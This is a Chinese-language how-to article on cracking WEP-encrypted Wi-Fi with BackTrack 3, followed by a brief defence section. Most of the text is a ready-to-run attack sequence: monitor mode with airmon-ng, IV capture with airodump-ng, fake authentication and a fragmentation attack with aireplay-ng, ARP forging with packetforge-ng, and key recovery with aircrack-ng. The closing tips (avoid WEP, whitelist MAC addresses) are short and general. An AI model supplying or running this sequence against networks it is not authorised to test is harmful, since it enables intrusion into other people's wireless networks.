BackTrack3(BT3)破解密碼
BackTrack是基于SLAX的自啟動運(yùn)行光盤,是基于linux發(fā)行版的系統(tǒng)。目前使用最多的是V3 Final版本,但這個版本對少數(shù)網(wǎng)卡支持存在一些問題,所以V3 Beta版本仍有部分人在使用。BackTrack集中了無線網(wǎng)絡(luò)幾乎能見到的安全和破解工具,可謂無線網(wǎng)絡(luò)破解的百寶箱,全球各地的人使用它破解了無數(shù)的無線網(wǎng)絡(luò),從側(cè)面促進(jìn)了大眾無線網(wǎng)絡(luò)安全意識的迅速提高。

BackTrack3
由于我們需要在BT3下破解,而使用的是Windows系統(tǒng),所以需要在虛擬機(jī)下安裝BT3CD版。安裝系統(tǒng)類型選擇Linux,空間需要大于4GB,具體安裝過程與其他系統(tǒng)并無兩樣,下面主要講解一下進(jìn)入系統(tǒng)后的破解工作。
打開終端窗口,輸入以下命令(括號內(nèi)為解釋內(nèi)容):
ifconfig -a (查看無線網(wǎng)卡Mac地址)
airmon-ng start wifi0 5
(其中wifi0是電腦里面給無線網(wǎng)卡的,一般都是這個,用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP頻道,可以在左下角開始菜單里面,找到第二項(xiàng)Internet中的無線網(wǎng)工具,查看AP的頻道Channel。然后會看到出現(xiàn)一個 Ath1,格式為XXX1樣式)
airodump-ng --ivs -w name -c 5 ath1 (5和ath1根據(jù)自己的結(jié)果修改)
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 (XX內(nèi)容為MAC地址)
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp (XX是網(wǎng)卡MAC地址,XXXXX-XXXXXX就是上次命令返回的文件名)
aireplay-ng -2 -r mrarp -x 1024 ath1
打開一個新的窗口,運(yùn)行
aircrack-ng -n 64 -b ap_mac name-XX.ivs(name-XX.ivs需要到桌面生成文件夾里查看,找到序號最大的那個)
一般情況下,用不了太久,密碼就會顯示出來,當(dāng)然只局限于破解WEP加密方式。
防范與總結(jié)
要杜絕WEP加密方式,另外最好的辦法就是在無線路由器上采取MAC綁定,對準(zhǔn)入MAC進(jìn)行白名單處理,不過這種方法不太適合公用場合的AP,但換一種加密方法還是比較容易的。

設(shè)置準(zhǔn)入設(shè)備防止蹭網(wǎng)者連接無線網(wǎng)絡(luò)
對于無線破解來說并不復(fù)雜,掌握了基本的方法后破解效率覺得稱得上高效,不過隨著上網(wǎng)資費(fèi)的下調(diào),蹭網(wǎng)情況會越來越少,加之卡皇設(shè)備功率大,輻射也不容小視,并且從法律的角度也是不允許這種行為的。希望廣大網(wǎng)友提高警惕,保護(hù)好自己的無線網(wǎng)絡(luò)。